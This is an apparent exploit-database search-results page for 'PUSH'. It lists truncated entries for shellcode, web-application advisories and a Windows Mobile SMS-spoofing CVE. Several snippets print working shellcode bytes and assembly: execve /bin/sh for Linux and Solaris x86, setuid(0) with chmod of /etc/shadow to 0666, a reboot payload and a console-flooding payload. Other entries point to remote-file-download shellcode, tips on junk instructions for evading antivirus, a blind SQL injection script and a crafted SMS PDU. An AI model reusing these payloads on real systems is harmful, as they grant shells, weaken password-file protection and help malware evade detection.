2244 matches found
SonyEricsson mobile phones WAP DoS
Crash on SMS or UDP/2948 WAP PUSH message handling...
PHPAds 2.0 Multiple Remote Vulnerabilities
No description provided by source. Vendor: http://blondish.net Versions: PHPAds 2.0 May also affect earlier versions Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at http://www.push55.co.uk/advisories.php?id=8 ---- First, we need to acquire administrative access. We point our browser at...
PHPAds 2.0 Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ========================================== PHPAds 2.0 Multiple Remote Vulnerabilities ========================================== Vendor: http://blondish.net Versions: PHPAds 2.0 May also affect earlier versions Credit: Danny Moules Critica...
Ninja Blog 4.8 - Cross-Site Request ForgeryHTML Injection
Ninja Blog 4.8 - Cross-Site Request ForgeryHTML Injection Vendor: http://ninjadesigns.co.uk Versions: Ninja Blog 4.8 May also affect earlier versions Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at https://www.push55.co.uk/index.php?s=ad&id=7 ---- Due to insufficient validation of...
Ninja Blog 4.8 Remote Information Disclosure Vulnerability
Exploit for unknown platform in category web applications ========================================================== Ninja Blog 4.8 Remote Information Disclosure Vulnerability ========================================================== Vendor: http://ninjadesigns.co.uk Versions: Ninja Blog 4.8 May...
linux/x86 PUSH reboot() - 30 bytes
No description provided by source. / Linux x86 PUSH reboot - 30 bytes Jonathan Salwan js.rac.projetATgmail.com Web: http://racprojet.zapto.org Disassembly of section .text: 08048054 .text: 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 62 6f 6f 74 push $0x746f6f62 804805c: 68 6e 2...
linux/x86 PUSH reboot() - 30 bytes
Exploit for linux/x86 platform in category shellcode ================================== linux/x86 PUSH reboot - 30 bytes ================================== / Linux x86 PUSH reboot - 30 bytes Jonathan Salwan Web: http://racprojet.zapto.org Disassembly of section .text: 08048054 : 8048054: 31 c0 xo...
linux/x86 PUSH reboot - 30 bytes
linux/x86 PUSH reboot - 30 bytes. Shellcode exploit for linx86 platform / Linux x86 PUSH reboot - 30 bytes Jonathan Salwan Web: http://racprojet.zapto.org Disassembly of section .text: 08048054 : 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 62 6f 6f 74 push $0x746f6f62 804805c: ...
Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)
Solaris/x86 - execve/bin/sh Shellcode 43 bytes. Shellcode exploit for Solarisx86 platform / Solaris shellcode - execve /bin/sh / include // http://www.shellcode.com.ar // // execve//bin/sh char shellcode= "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh "\xf7\xd0" // not eax "\x50" // push eax...
Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - Remote File Download Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux x86 - Remote file Download - 42 bytes Author: Jonathan Salwan Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes...
Linux/x86 - setuid(0) + chmod(/etc/shadow, 0666) Shellcode (37 bytes)
Linux/x86 - setuid0 + chmod/etc/shadow, 0666 Shellcode 37 bytes. Shellcode exploit for Linuxx86 platform / Title: linux/x86 setuid0 + chmod"/etc/shadow", 0666 Shellcode 37 Bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 db xor %ebx,%ebx b0 17 mov $0x17,%al cd 80 int...
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve/bin/sh Shellcode 21 bytes 3. Shellcode exploit for Linuxx86 platform / Title: linux/x86 Shellcode execve "/bin/sh" - 21 Bytes Date : 10 Feb 2011 Author : kernelpanik Thanks : cOokie, agix, antrhacks / / xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; ni...
Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)
Linux/x86 - execve/bin/sh,0,0 Shellcode 21 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push...
Any combination of instructions to achieve free kill-vulnerability warning-the black bar safety net
Note:writing flower instructions,refer to the following pairs of instructions,can be arbitrary free combination. Free to killeffect. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 1 0 -------which numbers can be arbitrary,note the following correspondence push -10...
PostNuke 0.764 - Blind SQL Injection
!/usr/bin/python ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | | |||| /| / / ================================================================================================= This was a priv8 Exploit...
linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes
No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e "\x68\x2f\x75\x72\x61" // push $0x6172752f...
Microsoft Windows Mobile短信处理器来源迷惑漏洞
BUGTRAQ ID: 26091 CVECAN ID: CVE-2007-5493 Windows Mobile是微软开发的用于手机的操作系统。 Windows Mobile的短信处理器中存在安全漏洞,如果发送了特制的WAP PUSH消息的话,就可能在接收者的手机上隐藏原始短信的发送者。 原始PDU如1所示,以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU,这样发送者的手机号码和发送时间都是错误的。 1 PDU(自动换行) 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81...
Design/Logic Flaw
The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded...
CVE-2007-5493
The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded...
CVE-2007-5493
CVE-2007-5493 affects Microsoft Windows Mobile 2005 Pocket PC Phone Edition. The vulnerability exists in the SMS handler where a specially crafted WAP PUSH can cause the PDU to be decoded incorrectly, allowing an attacker to hide the original sender field of an SMS without user interaction. The c...